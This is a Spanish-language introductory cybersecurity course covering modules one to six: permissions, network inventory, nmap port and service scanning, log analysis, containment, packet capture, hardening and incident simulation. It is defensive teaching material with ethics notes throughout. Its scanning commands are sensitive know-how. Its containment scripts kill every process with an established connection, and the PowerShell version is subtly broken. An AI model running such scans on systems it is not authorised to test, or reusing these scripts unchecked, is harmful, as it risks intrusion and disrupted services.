Máster Profesional en Ciberseguridad: De 0 al master academico

📊 Análisis Académico y Propuesta de Valor

Este programa te lleva paso a paso desde los fundamentos básicos hasta un nivel profesional. Aprenderás a prevenir, detectar, responder e investigar incidentes de ciberseguridad, usando estándares internacionales y entornos seguros.

Ejes de Aprendizaje

• Fundamentos: Confidencialidad, Integridad y Disponibilidad, gestión de riesgos, buenas prácticas y normas.
• Capas Técnicas: Redes, equipos, nube, aplicaciones web y protección de datos.
• Operaciones: Detección, respuesta, análisis forense y pruebas controladas.
• Procesos y Negocio: Políticas internas, cultura de seguridad, servicios y monetización ética.

Módulos incluidos

1. Fundamentos de Ciberseguridad
2. Detección de Vulnerabilidades Básicas
3. Detección y Respuesta Guiada
4. Análisis de Tráfico de Red
5. Hardening y Protección Proactiva
6. Simulación de Incidentes y Plan de Respuesta
7. Investigación Forense Digital
8. Seguridad en Aplicaciones Web
9. Seguridad en Redes Inalámbricas
10. Análisis Forense Digital Básico
11. Análisis de Tráfico Avanzado
12. Gestión de Incidentes Avanzada
13. Pruebas de Penetración Avanzadas
14. Red Team contra Blue Team
15. Seguridad en la Nube Multiplataforma
16. Ciberseguridad Asistida con Inteligencia Artificial

Cada módulo incluye teoría, laboratorios prácticos y un entregable que podrás mostrar como parte de tu portafolio profesional.

🚀 Introducción

La ciberseguridad ya no es exclusiva de grandes empresas. Hoy es esencial para cualquier organización o profesional que maneje información digital. Aquí aprenderás a proteger sistemas, detectar amenazas y responder de forma segura.

Logros que obtendrás

• Aplicar controles de seguridad en redes, equipos y entornos en la nube.
• Proteger datos con cifrado, copias de seguridad y acceso mínimo.
• Identificar y responder ante amenazas como phishing, malware o fugas de datos.
• Realizar investigaciones forenses y elaborar informes claros.
• Diseñar y ejecutar pruebas de seguridad controladas.
• Integrar inteligencia artificial en tus defensas.

💡 Sobre SO-IN

SO-IN forma a profesionales y emprendedores para que usen la tecnología de manera segura y puedan ofrecer servicios éticos de ciberseguridad. Nuestra filosofía es: claridad, práctica y acción.

• Enfoque en seguridad por capas y modelo Zero Trust simplificado.
• Material útil: listas de verificación, plantillas, guías y scripts.
• Actualizaciones constantes para adaptarse a los cambios en el sector.

🏛️ Módulo 1: Tus Primeros Pasos en Ciberseguridad: Fundamentos y Modelado de Amenazas

¡Hola! 👋 Bienvenido/a al módulo 1 de ciberseguridad. Aquí vamos a aprender a proteger tu información digital de una forma muy sencilla y práctica. No necesitas saber mucho de computadoras, ¡te guiaré en cada paso!

✅ Al final de este módulo, serás capaz de:

• Aplicar los principios fundamentales de la ciberseguridad (CIA).
• Realizar un inventario básico de tus dispositivos en red.
• Implementar medidas de protección de datos a nivel de sistema de archivos.
• Identificar la importancia de la seguridad en el entorno digital.

📚 Glosario Técnico

Antes de comenzar, aquí tienes algunos términos clave que usaremos durante el módulo. Si algo no te suena familiar, no te preocupes: lo iremos viendo con ejemplos.

• Permisos (Permissions): Reglas que controlan quién puede leer, modificar o ejecutar un archivo o carpeta.
• Dirección IP: Identificador único de un dispositivo en una red.
• nmap: Herramienta para escanear redes y descubrir dispositivos activos.
• Principio de Privilegio Mínimo: Dar a cada usuario solo los permisos estrictamente necesarios.
• Inventario de Activos: Lista organizada de dispositivos, sistemas y datos que debes proteger.

🛡️ Concepto 1: Las Tres Reglas de Oro (CIA)

Imagina que tienes una caja del tesoro muy valiosa. Para protegerla, necesitas seguir tres reglas muy importantes:

1. Confidencialidad (el Secreto): Solo tú sabes dónde está la caja y qué hay dentro. No quieres que nadie más lo vea. En digital, es como ponerle una contraseña a tus fotos para que solo tú las veas.
2. Integridad (que no la cambien): Quieres asegurarte de que nadie pueda abrir la caja y cambiar lo que hay dentro sin que tú te des cuenta. En digital, es como tener una señal que te avisa si alguien tocó tus archivos.
3. Disponibilidad (siempre a mano): Necesitas poder abrir tu caja cuando quieras. Si la pierdes o se rompe, el tesoro ya no está "disponible". En digital, es tener una copia de seguridad de tus archivos por si se borran.

Estas tres ideas (Confidencialidad, Integridad, Disponibilidad) son la base de la ciberseguridad.

🕵️‍♂️ Concepto 2: Saber qué proteger (Tu Inventario de Dispositivos)

Imagina que quieres proteger todas tus cosas de valor en tu casa. Lo primero es hacer una lista de todo lo que tienes, ¿verdad? Un inventario de activos es exactamente eso, pero para tus dispositivos y la información que guardan.

🛠️ Laboratorio 1: Tu Carpeta Súper Secreta (¡Protegiendo tu Confidencialidad!)

Fundamento: A esto le llamamos "dar el privilegio mínimo", es decir, darle a alguien solo lo que necesita y nada más.

        # 🗂️ Paso 1 — Crear carpeta secreta
        # 'mkdir' significa 'make directory' (crear carpeta)
        mkdir mi_carpeta_secreta

        # 📝 Paso 2 — Guardar un mensaje secreto
        # 'echo' escribe un texto y '>' lo guarda en un archivo llamado 'mensaje_secreto.txt'
        echo "Este mensaje es un secreto para mi curso de ciberseguridad." > mi_carpeta_secreta/mensaje_secreto.txt

        # 🔒 Paso 3 — Proteger la carpeta
        # 'chmod 700' significa:
        # - Dueño: leer, escribir, ejecutar
        # - Otros: sin permisos
        chmod 700 mi_carpeta_secreta
  

ls -ld mi_carpeta_secreta
  

        #!/bin/bash
        mkdir "$1"
        echo "Archivo secreto para $USER" > "$1/mensaje_secreto.txt"
        chmod 700 "$1"
    

        chmod +x crear_carpeta_secreta.sh
    

        ./crear_carpeta_secreta.sh nueva_carpeta
    

        # 🗂️ Paso 1 — Crear carpeta secreta
        # Este comando crea una carpeta llamada "mi_carpeta_secreta" en el disco C:
        New-Item -Path "C:\mi_carpeta_secreta" -ItemType Directory

        # 📝 Paso 2 — Guardar un mensaje secreto
        # 'Out-File' crea un archivo y escribe el texto indicado dentro de él.
        Out-File -FilePath "C:\mi_carpeta_secreta\mensaje_secreto.txt" -InputObject "Este mensaje es un secreto para mi curso de ciberseguridad."
  

        icacls C:\mi_carpeta_secreta
    

        icacls C:\mi_carpeta_secreta > C:\mi_carpeta_secreta\permisos.txt
    

🛠️ Laboratorio 2: "Mis Aparatos Conectados" (¡Creando un Inventario Básico!)

Fundamento: Vamos a escanear tu red doméstica para ver qué dispositivos están conectados y encendidos.

        # 🔍 Paso 1 — Instalar "nmap"
        # 'nmap' es una herramienta para descubrir dispositivos en la red.
        # 'sudo' te da permisos de administrador, 'apt install' instala programas.
        sudo apt update
        sudo apt install nmap

        # 🌐 Paso 2 — Encontrar la dirección de tu red
        # 'ip a' muestra la configuración de tus interfaces de red.
        ip a

        # (Busca una línea con 'inet' y un número como 192.168.1.10/24.
        # Ese '/24' indica que tu red es, por ejemplo, 192.168.1.0/24)
  

        # 📡 Paso 3 — Escanear la red para encontrar dispositivos activos
        # Reemplaza '192.168.1.0/24' con la dirección que encontraste en el paso anterior.
        # '-sn' indica a nmap que solo detecte dispositivos, no que escanee puertos.
        sudo nmap -sn 192.168.1.0/24
  

        arp -n
    

        sudo nmap -sn --packet-trace 192.168.1.0/24
    

        sudo nmap -sn 192.168.1.0/24 > resultado_escaneo.txt
    

        # 🌐 Paso 1 — Encontrar la dirección de tu red
        # 'ipconfig' muestra la configuración de red de tu equipo.
        ipconfig
  

        # 📡 Paso 2 — Escanear la red para encontrar dispositivos activos
        # Reemplaza '192.168.1' con los primeros tres números de tu dirección de red.
        # Este bucle intenta "tocar la puerta" de cada IP para ver si responde.
        for ($i=1; $i -le 254; $i++) {
            $ip = "192.168.1.$i"
            if (Test-Connection -ComputerName $ip -Quiet -Count 1) {
                Write-Host "$ip está activo"
            }
        }
  

✅ Trabajo Práctico del Módulo 1

📦 Instrucciones de Entrega

Para este módulo, deberás entregar evidencias de que realizaste correctamente los ejercicios.

📦 Formato de Entrega

Sube un único archivo comprimido `modulo1_Apellido_Nombre.zip` que contenga las siguientes capturas:

1. Laboratorio 1:
   • Linux: captura de pantalla mostrando el resultado de ls -ld mi_carpeta_secreta.
   • Windows: captura de pantalla de las Opciones avanzadas de seguridad de la carpeta mi_carpeta_secreta.
2. Laboratorio 2:
   • Linux: captura de pantalla con la salida del escaneo nmap -sn.
   • Windows: captura de pantalla con la lista de IPs activas encontrada por PowerShell.

📏 Rúbrica de Evaluación

• **Laboratorio 1 (40%):** Evidencia clara del cambio de permisos o configuración de seguridad.
• **Laboratorio 2 (40%):** Evidencia clara del inventario de red.
• **Formato y entrega (20%):** Cumplimiento del formato de entrega y la nomenclatura del archivo.

📝 Checklist de Entrega

Antes de subir, asegúrate de:

• [ ] Incluir todas las capturas de pantalla solicitadas en el formato correcto.
• [ ] Nombrar tu archivo ZIP como `modulo1_Apellido_Nombre.zip`.
• [ ] Comprobar que todas las capturas sean legibles y muestren la evidencia pedida.

⚠️ Notas éticas y accesibilidad

• No realices estos escaneos en redes que no te pertenezcan.
• Todos los comandos y sus resultados deben ser ejecutados en un entorno controlado por ti.
• Los comandos están en formato pre-formateado para ser accesibles.

📘 Conexión con Estándares (Contexto profesional)

Lo que hiciste en este módulo alinea con prácticas de **ISO/IEC 27001** (control de acceso e inventario de activos) y con el pilar **Identify** del **NIST Cybersecurity Framework** (gobierno de activos). Esto te va acostumbrando a un lenguaje profesional desde el inicio.

🚀 Cierre del Módulo

Hoy aprendiste a proteger archivos y a identificar los dispositivos en tu red. Estos son los cimientos de un profesional en ciberseguridad. En el próximo módulo, pasaremos a detectar vulnerabilidades comunes y a implementar defensas básicas (cifrado, contraseñas robustas, actualización segura y endurecimiento del sistema). Paso a paso, irás construyendo las habilidades para convertirte en un/a verdadero/a Master en Ciberseguridad.

🏛️ Módulo 2: Detección de Vulnerabilidades Básicas

En este módulo aprenderás a identificar servicios expuestos, versiones y posibles vulnerabilidades en entornos controlados. Trabajaremos de forma segura y ética, con evidencias reproducibles y priorización basada en riesgo.

✅ Al final de este módulo, serás capaz de:

• Descubrir hosts y escanear puertos en una red.
• Enumerar servicios y banners para identificar versiones.
• Asociar versiones de software con CVEs conocidas.
• Crear un plan de remediación y priorización basado en riesgo.

📚 Glosario Técnico

• Vulnerabilidad: Debilidad explotable en un sistema.
• Escaneo de puertos: Identifica servicios escuchando en un host.
• Banner grabbing: Obtención de metadatos de un servicio (versión/plataforma).
• CVE: Identificador público de vulnerabilidad conocida.
• CVSS: Sistema de puntuación de severidad de vulnerabilidades.
• Falso positivo: Hallazgo reportado que no aplica realmente.

🧰 Prerrequisitos del laboratorio

Estos son los requisitos para que puedas realizar las actividades del módulo.

• Autorización expresa: escanea solo tus equipos/lab o sistemas permitidos.
• Linux (Debian/Ubuntu): nmap, curl, (opcional) openssl.
• Windows: PowerShell 5+; winget o choco para instalar nmap; curl (incluido en Windows 10+).

🎯 Concepto 1: Ciclo de Gestión de Vulnerabilidades

La gestión de vulnerabilidades sigue un ciclo: descubrimiento → análisis/triage → remediación → verificación. La enumeración (nmap, banners, versiones) no es explotación; su objetivo es identificar exposición y priorizar corrección. La severidad suele referenciar CVSS (baja, media, alta, crítica) y debe cruzarse con el contexto del activo.

🛠️ Laboratorio 1 — Descubrimiento y escaneo de puertos

Fundamento: Identificar superficie de ataque (servicios expuestos) como base de cualquier evaluación.

        # 📦 Paso 1 — Instalar nmap si no está presente
        sudo apt update && sudo apt install -y nmap

        # 🔍 Paso 2 — Descubrir hosts activos en tu subred (ARP/Ping)
        nmap -sn 192.168.1.0/24 -oN hosts_activos.txt

        # 🚪 Paso 3 — Escaneo de puertos TCP comunes en un host específico
        nmap -sS -Pn -p 1-1024 192.168.1.10 -oN puertos_192.168.1.10.txt
  

        PORT   STATE SERVICE
        22/tcp open  ssh
        80/tcp open  http
  

        # 📦 Paso 1 — Instalar nmap (elige un método)
        winget install -e --id nmap
        # o
        choco install nmap -y

        # 🔍 Paso 2 — Descubrir hosts activos en tu red
        nmap -sn 192.168.1.0/24 -oN hosts_activos.txt

        # 🚪 Paso 3 — Escanear puertos TCP comunes en un host específico
        nmap -sS -Pn -p 1-1024 192.168.1.10 -oN puertos_192.168.1.10.txt
  

🕵️‍♂️ Laboratorio 2 — Enumeración de servicios y banners

Fundamento: Versiones y metadatos permiten asociar vulnerabilidades conocidas.

        # 🔍 Paso 1 — Detección de versiones y scripts seguros por defecto
        nmap -sV -sC 192.168.1.10 -oN enum_192.168.1.10.txt

        # 🌐 Paso 2 — Obtener banner HTTP (cabeceras)
        curl -I http://192.168.1.10

        # 🔐 Paso 3 — (Opcional) Consultar certificado TLS y protocolos soportados
        echo | openssl s_client -connect 192.168.1.10:443 -servername 192.168.1.10 2>/dev/null | openssl x509 -noout -issuer -subject -dates
    

        PORT   STATE SERVICE VERSION
        80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
  

        nmap -sV --script=banner,http-title,ssl-cert,ssh2-enum-algos 192.168.1.10 -oN analisis_extendido.txt
  

        # 🔍 Paso 1 — Detección de versiones y scripts seguros por defecto
        nmap -sV -sC 192.168.1.10 -oN enum_192.168.1.10.txt

        # 🌐 Paso 2 — Obtener banner HTTP (cabeceras)
        curl -I http://192.168.1.10
  

        nmap -sV --script=banner,http-title,ssl-cert 192.168.1.10 -oN analisis_extendido.txt
  

🧾 Laboratorio 3 — Normalización de hallazgos

Fundamento: Estandarizar datos facilita priorizar y comunicar.

Crea un CSV con este encabezado exacto y registra tus hallazgos:

Host,IP,Puerto,Protocolo,Servicio,Version,Evidencia

• Host: nombre o etiqueta.
• Evidencia: fragmento de salida de nmap/curl que soporte la versión.

🎯 Laboratorio 4 — Cruce con CVE y priorización (sin explotación)

Fundamento: Priorizar por severidad (CVSS) y contexto del activo.

1. Investiga si la combinación Servicio + Versión tiene CVEs conocidas (usa fuentes oficiales).
2. Registra en un CSV con esta cabecera exacta:

   Host,IP,Servicio,Version,CVE,CVSS Base,Severidad (Baja/Media/Alta/Crítica),Referencia,Notas

3. Prioriza: CVSS ≥ 7.0 = Alta/Crítica; 4.0–6.9 = Media; < 4.0 = Baja (ajusta por criticidad del activo).

🛡️ Laboratorio 5 — Plan de remediación

Fundamento: Cerrar el ciclo: acción, responsable y fecha objetivo.

Crea un CSV con esta cabecera exacta:

Hallazgo/CVE,Severidad,Recomendación,Propietario,Fecha objetivo,Estado

• Recomendación: actualización, deshabilitar servicio, hardening, segmentación, compensatorios.
• Estado: Abierto / En curso / Mitigado / Cerrado.

✅ Trabajo Práctico del Módulo 2

📦 Instrucciones de Entrega

Para este módulo, deberás entregar un único archivo comprimido con todas las evidencias de los laboratorios.

📦 Formato de Entrega

Sube `modulo2_Apellido_Nombre.zip` con esta estructura:

modulo2_Apellido_Nombre.zip
├─ escaneo/
│  ├─ hosts_activos.txt
│  └─ puertos_<IP>.txt
├─ enumeracion/
│  ├─ enum_<IP>.txt
│  └─ http_headers_<IP>.txt (si aplica)
├─ tablas/
│  ├─ hallazgos.csv
│  └─ vulnerabilidades.csv
└─ remediacion/
   └─ plan_remediacion.csv

📏 Rúbrica de Evaluación

• **Escaneo (20%)** — Parámetros adecuados, evidencia clara, reproducibilidad.
• **Enumeración (20%)** — Identificación de versiones y banners con soporte (evidencias).
• **Hallazgos normalizados (20%)** — hallazgos.csv correcto y completo (≥3 servicios).
• **CVE & Prioridad (25%)** — vulnerabilidades.csv con CVEs/justificación y severidad coherente (CVSS).
• **Remediación (15%)** — Acciones realistas con propietario y fecha objetivo.

📝 Checklist de Entrega

Antes de subir, asegúrate de:

• [ ] Que todas las capturas y archivos de texto estén en las carpetas correctas.
• [ ] Que el archivo ZIP tenga el nombre correcto: `modulo2_Apellido_Nombre.zip`.
• [ ] Que los archivos `csv` tengan la cabecera exacta solicitada.

⚠️ Notas éticas y accesibilidad

• Recuerda escanear solo sistemas que te pertenezcan o para los que tengas autorización.
• No se debe realizar ninguna explotación de las vulnerabilidades descubiertas.
• Los comandos están en formato pre-formateado para ser accesibles.

📘 Conexión con Estándares (contexto profesional)

La gestión de vulnerabilidades se alinea con prácticas de **NIST CSF** (ID.AM, PR.AC, DE.CM), **ISO/IEC 27001/27002** y **CIS Controls v8**. Esto te acostumbra a un lenguaje profesional desde el inicio.

🚀 Cierre del Módulo

Hoy aprendiste a identificar servicios expuestos, versiones, y asociar vulnerabilidades conocidas para priorizar su corrección. En el próximo módulo, pasaremos a detectar incidentes en tiempo real y responder de forma segura para evitar su propagación. Paso a paso, irás construyendo las habilidades para convertirte en un/a verdadero/a Master en Ciberseguridad.

🏛️ Módulo 3: Detección y Respuesta Guiada

En este módulo aprenderás a detectar incidentes en tiempo real y responder de forma segura para evitar propagación y preservar evidencia. Practicaremos detección en logs, análisis de procesos y conexiones, y acciones de contención en entornos controlados.

✅ Al final de este módulo, serás capaz de:

• Monitorear procesos y conexiones para detectar anomalías.
• Analizar logs del sistema para identificar intentos de intrusión.
• Aplicar acciones de contención inmediatas.
• Documentar un incidente para análisis forense futuro.

📚 Glosario Técnico

• IOC: Huella técnica que sugiere intrusión.
• Event Log: Registro de eventos del sistema operativo.
• Netstat: Herramienta para listar conexiones activas.
• Contención: Acciones para limitar el alcance del incidente.

🧰 Prerrequisitos del laboratorio

Estos son los requisitos para que puedas realizar las actividades del módulo.

• Autorización para trabajar en el sistema objetivo (laboratorio o propio).
• Linux (Debian/Ubuntu): net-tools, procps, curl.
• Windows: PowerShell 5+, permisos administrativos para ejecutar Get-Process, netstat y Get-WinEvent.

🎯 Concepto 1: Detección de Incidentes

La detección de incidentes se basa en el monitoreo de procesos, conexiones y logs para identificar comportamientos anómalos que podrían indicar un compromiso del sistema.

🛠️ Laboratorio 1 — Monitoreo de procesos y conexiones

Fundamento: Procesos o conexiones inusuales pueden ser señales tempranas de compromiso.

        # Ver procesos ordenados por uso de CPU/memoria
        top

        # Listar conexiones y procesos asociados
        sudo netstat -tulpn

        # Filtrar conexiones establecidas hacia IP externas
        sudo netstat -tupn | grep ESTABLISHED
    

lsof -i -P -n | grep ESTABLISHED > reporte_conexiones.txt

        # Listar procesos por uso de CPU
        Get-Process | Sort-Object CPU -Descending

        # Mostrar conexiones activas
        netstat -ano

        # Filtrar conexiones establecidas
        netstat -ano | findstr ESTABLISHED
    

Get-Process -Id <PID> | Export-Csv reporte_proceso.csv -NoTypeInformation

🕵️ Laboratorio 2 — Análisis rápido de logs

Fundamento: Los logs registran intentos fallidos y accesos inusuales.

        # Intentos fallidos de login
        sudo grep "Failed password" /var/log/auth.log

        # Accesos SSH exitosos
        sudo grep "Accepted password" /var/log/auth.log
    

grep "Failed password" /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -nr > intentos_por_ip.txt

        # Inicios de sesión fallidos (ID 4625)
        Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} | Format-Table TimeCreated, Message -AutoSize

        # Inicios de sesión exitosos (ID 4624)
        Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624} | Format-Table TimeCreated, Message -AutoSize
    

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} | Export-Csv eventos_fallidos.csv -NoTypeInformation

🛡️ Laboratorio 3 — Contención inmediata

Fundamento: Aislar y detener un proceso malicioso minimiza daños.

        # Deshabilitar red
        sudo ip link set eth0 down

        # Finalizar proceso
        sudo kill -9 

        # Rehabilitar red
        sudo ip link set eth0 up
    

for pid in $(netstat -tupn | grep ESTABLISHED | awk '{print $7}' | cut -d/ -f1); do
        echo "$(date) - Finalizando proceso $pid" >> contencion.log
        kill -9 $pid
        done
    

        # Deshabilitar red
        Disable-NetAdapter -Name "Ethernet" -Confirm:$false

        # Finalizar proceso
        Stop-Process -Id  -Force

        # Habilitar red
        Enable-NetAdapter -Name "Ethernet"
    

$conexiones = netstat -ano | findstr ESTABLISHED
        foreach ($c in $conexiones) {
        $pid = ($c -split '\s+')[-1]
        Stop-Process -Id $pid -Force
        "$(Get-Date) - Finalizado proceso $pid" | Out-File contencion.log -Append
        }
    

✅ Trabajo Práctico del Módulo 3

📦 Instrucciones de Entrega

Para este módulo, deberás entregar un único archivo comprimido con todas las evidencias de los laboratorios.

📦 Formato de Entrega

Sube modulo3_Apellido_Nombre.zip con esta estructura:

modulo3_Apellido_Nombre.zip
├─ deteccion/
│  ├─ procesos.txt
│  ├─ conexiones.txt
├─ logs/
│  └─ analisis_logs.txt
├─ contencion/
│  ├─ captura_aislamiento.png
│  └─ captura_kill.png
└─ resumen/
   └─ resumen_incidente.txt

📏 Rúbrica de Evaluación

• **Detección (25%):** Evidencia clara de monitoreo de procesos y conexiones, y análisis de logs.
• **Logs (25%):** Presentación de los resultados del análisis de logs.
• **Contención (25%):** Evidencia de las acciones de aislamiento y finalización de procesos.
• **Documentación (25%):** Archivo de resumen con la información del incidente.

📝 Checklist de Entrega

Antes de subir, asegúrate de:

• [ ] Que todas las capturas y archivos de texto estén en las carpetas correctas.
• [ ] Que el archivo ZIP tenga el nombre correcto: `modulo3_Apellido_Nombre.Nombre.zip`.
• [ ] Que todas las evidencias sean claras y se puedan verificar.

⚠️ Notas éticas y accesibilidad

• Recuerda realizar estos laboratorios en un entorno controlado y con autorización.
• La contención inmediata es un paso crítico y debe ejecutarse con precaución.
• Los comandos están en formato pre-formateado para ser accesibles.

📘 Conexión con Estándares (contexto profesional)

Lo que hiciste en este módulo se alinea con las prácticas de gestión de incidentes del **NIST SP 800-61**, **ISO/IEC 27035** y el **CIS Controls v8**.

🚀 Cierre del módulo

Ahora sabes detectar y responder a incidentes de forma segura y documentada. Esto sienta la base para el Módulo 4: Hardening y Protección Proactiva.

🏛️ Módulo 4: Análisis de Tráfico de Red

En este módulo aprenderás a capturar, analizar y filtrar tráfico de red para detectar patrones sospechosos, identificar protocolos y comprender el flujo de datos en un entorno controlado. Usaremos herramientas como Wireshark y tcpdump, siempre respetando las buenas prácticas y la legalidad.

🧰 Prerrequisitos del laboratorio

• Linux (Debian/Ubuntu) o Windows 10+ con privilegios de administrador.
• tcpdump instalado en Linux, Wireshark en Windows/Linux.
• Entorno de red de laboratorio o autorización para capturas.

🎯 Objetivos de Aprendizaje

• Capturar paquetes de red en interfaces específicas.
• Filtrar tráfico por protocolo, puerto o dirección IP.
• Identificar patrones de comportamiento normal vs anómalo.
• Generar y exportar reportes de captura para análisis posterior.

📚 Glosario Técnico

• Paquete: Unidad básica de datos transmitida por la red.
• Protocolo: Conjunto de reglas que rigen la comunicación (HTTP, DNS, TCP, UDP, etc.).
• PCAP: Formato de archivo estándar para almacenar capturas de red.
• Filtro BPF: Sintaxis usada para filtrar tráfico en herramientas como tcpdump/Wireshark.

📚 Marco teórico (síntesis)

El análisis de tráfico de red es clave para la detección temprana de incidentes. Herramientas como Wireshark permiten ver el detalle de cada paquete, incluyendo encabezados y datos, mientras que tcpdump permite capturas rápidas desde la terminal. Filtrar tráfico es esencial para centrarse en eventos relevantes y reducir ruido.

🛠️ Laboratorio 1 — Captura de tráfico

        # Capturar tráfico en la interfaz eth0 y guardarlo en captura.pcap
        sudo tcpdump -i eth0 -w captura.pcap
      

🧪 Laboratorio 2 — Filtrado de tráfico

        # Capturar solo tráfico HTTP
        sudo tcpdump -i eth0 tcp port 80 -w http_traffic.pcap
      

        tcp.port == 80
      

⚠️ Errores Comunes

• Capturar tráfico sin autorización.
• Olvidar detener la captura, generando archivos gigantes.
• No filtrar datos, lo que dificulta el análisis.

🔗 Referencias y Marcos

• NIST CSF: Detect (DE.CM-1, DE.CM-7)
• ISO/IEC 27002: 12.4 Registro y monitoreo
• Documentación oficial de Wireshark y tcpdump

📋 Trabajo Práctico del Modulo 4

1. Captura tráfico HTTP y DNS en tu red local durante 2 minutos.
2. Filtra solo las solicitudes DNS y guarda la salida en un archivo CSV exportado desde Wireshark.
3. Identifica 3 IPs más consultadas y documenta su dominio asociado.

📦 Formato de Entrega

        modulo4_Apellido_Nombre.zip
        ├─ capturas/
        │  ├─ http_dns.pcap
        │  ├─ dns_filtrado.csv
        └─ reporte/
        └─ analisis.txt
  

📏 Rúbrica de Evaluación

• Captura correcta (30%)
• Filtrado preciso (30%)
• Análisis y reporte (40%)

✅ Checklist de Calidad

• Captura incluye tráfico solicitado.
• Filtros aplicados correctamente.
• Reporte claro y completo.

🔒 Notas Éticas y Accesibilidad

• Capturar solo en entornos autorizados.
• Anonimizar direcciones IP reales en el reporte si es necesario.

📘 Conexión con Estándares (contexto profesional)

Lo que hiciste en este módulo se alinea con el NIST Cybersecurity Framework (Detect) y con el control 12.4 de ISO/IEC 27002, reforzando competencias en monitoreo y análisis de red.

🚀 Cierre del Módulo

Ahora eres capaz de capturar y filtrar tráfico de red de forma segura, distinguir patrones normales de los anómalos y generar evidencias útiles para investigación o respuesta ante incidentes. En el próximo módulo abordaremos Hardening y Protección Proactiva.

🏛️ Módulo 5: Hardening y Protección Proactiva

En este módulo aprenderás a reforzar la seguridad de sistemas y redes aplicando buenas prácticas de configuración, control de acceso y reducción de superficie de ataque. Implementarás medidas proactivas para prevenir incidentes antes de que ocurran.

✅ Al final de este módulo, serás capaz de:

• Aplicar configuraciones seguras en sistemas Linux y Windows.
• Deshabilitar servicios innecesarios y cerrar puertos no usados.
• Configurar contraseñas seguras y autenticación multifactor.
• Implementar reglas de firewall básicas.
• Verificar la efectividad del hardening aplicado.

📚 Glosario Técnico

• Hardening: Proceso de asegurar un sistema reduciendo su superficie de ataque.
• Superficie de ataque: Conjunto de puntos por los que un sistema puede ser atacado.
• MFA: Autenticación Multifactor.
• Firewall: Sistema que controla el tráfico entrante y saliente según reglas definidas.

🧰 Prerrequisitos del laboratorio

• Acceso administrativo a un sistema Linux o Windows de laboratorio.
• Herramientas: ufw o iptables en Linux; Firewall de Windows.
• Conexión a internet para instalar actualizaciones.

🛠️ Laboratorio 1 — Actualización y limpieza de servicios

Fundamento: Mantener el sistema actualizado y libre de servicios innecesarios reduce vulnerabilidades.

        # Actualizar repositorios y paquetes
        sudo apt update && sudo apt upgrade -y

        # Listar servicios en ejecución
        sudo systemctl list-units --type=service

        # Deshabilitar un servicio innecesario
        sudo systemctl disable nombre_servicio --now
      

        # Instalar actualizaciones pendientes
        Install-WindowsUpdate -AcceptAll -AutoReboot

        # Listar servicios
        Get-Service | Where-Object {$_.Status -eq "Running"}

        # Detener y deshabilitar un servicio
        Stop-Service -Name "NombreServicio" -Force
        Set-Service -Name "NombreServicio" -StartupType Disabled
      

🛠️ Laboratorio 2 — Configuración de firewall

Fundamento: Controlar el tráfico de red previene accesos no autorizados.

        # Activar UFW y permitir solo SSH y HTTP
        sudo ufw enable
        sudo ufw allow 22/tcp
        sudo ufw allow 80/tcp
        sudo ufw deny from any
      

        # Permitir HTTP
        New-NetFirewallRule -DisplayName "Allow HTTP" -Direction Inbound -LocalPort 80 -Protocol TCP -Action Allow

        # Bloquear todo lo demás (ejemplo simplificado)
        Set-NetFirewallProfile -Profile Domain,Public,Private -DefaultInboundAction Block
      

✅ Trabajo Práctico del Módulo 5

📦 Instrucciones de Entrega

Entrega un único archivo comprimido con evidencias y configuraciones aplicadas.

📦 Formato de Entrega

modulo5_Apellido_Nombre.zip
├─ evidencias/
│  ├─ servicios_antes.txt
│  ├─ servicios_despues.txt
│  ├─ reglas_firewall.txt
└─ reporte/
   └─ analisis_hardening.txt

📏 Rúbrica de Evaluación

• Actualizaciones y limpieza (30%): Servicios innecesarios deshabilitados y sistema actualizado.
• Firewall (40%): Reglas coherentes con el entorno y documentadas.
• Reporte (30%): Explicación clara de cambios y justificación de medidas.

📝 Checklist de Entrega

• [ ] Evidencia de servicios antes y después.
• [ ] Archivo con reglas de firewall.
• [ ] analisis_hardening.txt con justificación de cambios.
• [ ] Nombre de archivo: modulo5_Apellido_Nombre.zip.

⚠️ Notas éticas y accesibilidad

• Aplica cambios solo en entornos autorizados.
• Documenta cualquier configuración revertida.
• Proporciona capturas con descripciones para accesibilidad.

📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con ISO/IEC 27002 (9.1, 13.1, 13.2), CIS Controls v8 (4, 5, 6) y NIST CSF (Protect: PR.IP, PR.AC, PR.PT), fortaleciendo la postura de seguridad preventiva.

🚀 Cierre del Módulo

Ahora sabes aplicar técnicas de hardening para reducir la superficie de ataque, configurar un firewall básico y reforzar las defensas del sistema. En el próximo módulo abordaremos Simulación de Incidentes y Planes de Respuesta.

🏛️ Módulo 6: Simulación de Incidentes y Plan de Respuesta

En este módulo aprenderás a ejecutar simulaciones controladas de incidentes de seguridad para poner a prueba la capacidad de detección, respuesta y recuperación de tu organización. Implementarás procedimientos claros y medibles, alineados con buenas prácticas internacionales.

• Simular ataques y fallos de seguridad de forma controlada.
• Medir tiempos de detección y respuesta (MTTD/MTTR).
• Ejecutar protocolos de contención, erradicación y recuperación.
• Generar informes post-incidente con lecciones aprendidas.

📚 Glosario Técnico

• MTTD: Mean Time to Detect — Tiempo promedio de detección.
• MTTR: Mean Time to Respond/Recover — Tiempo promedio de respuesta/recuperación.
• Simulación de incidente: Ejercicio controlado que emula un ataque o fallo de seguridad.
• Post-mortem: Informe de lecciones aprendidas tras un incidente.

🧰 Prerrequisitos del laboratorio

• Entorno de laboratorio o sistemas de prueba (no producción).
• Herramientas de monitoreo (SIEM, logs del sistema, herramientas forenses).
• Equipo de respuesta a incidentes identificado y roles asignados.

🛠️ Laboratorio 1 — Simulación de ataque controlado

Fundamento: La práctica controlada mejora la reacción ante incidentes reales.

        # Generar tráfico sospechoso simulado (ejemplo: escaneo de puertos)
        nmap -sS -p 1-100 192.168.1.20

        # Verificar que el SIEM o logs detecten el evento
        tail -f /var/log/syslog
      

        # Simular intento de acceso no autorizado
        Test-NetConnection 192.168.1.20 -Port 3389

        # Revisar el Visor de Eventos
        Get-WinEvent -LogName Security -MaxEvents 10
      

🛠️ Laboratorio 2 — Ejecución del plan de respuesta

Fundamento: Tener un plan documentado reduce el impacto del incidente.

1. Identificar el incidente (detectar en logs, alertas del SIEM, reportes internos).
2. Contener la amenaza (aislar el sistema afectado, cortar conexiones sospechosas).
3. Erradicar la causa raíz (eliminar malware, cerrar vulnerabilidades).
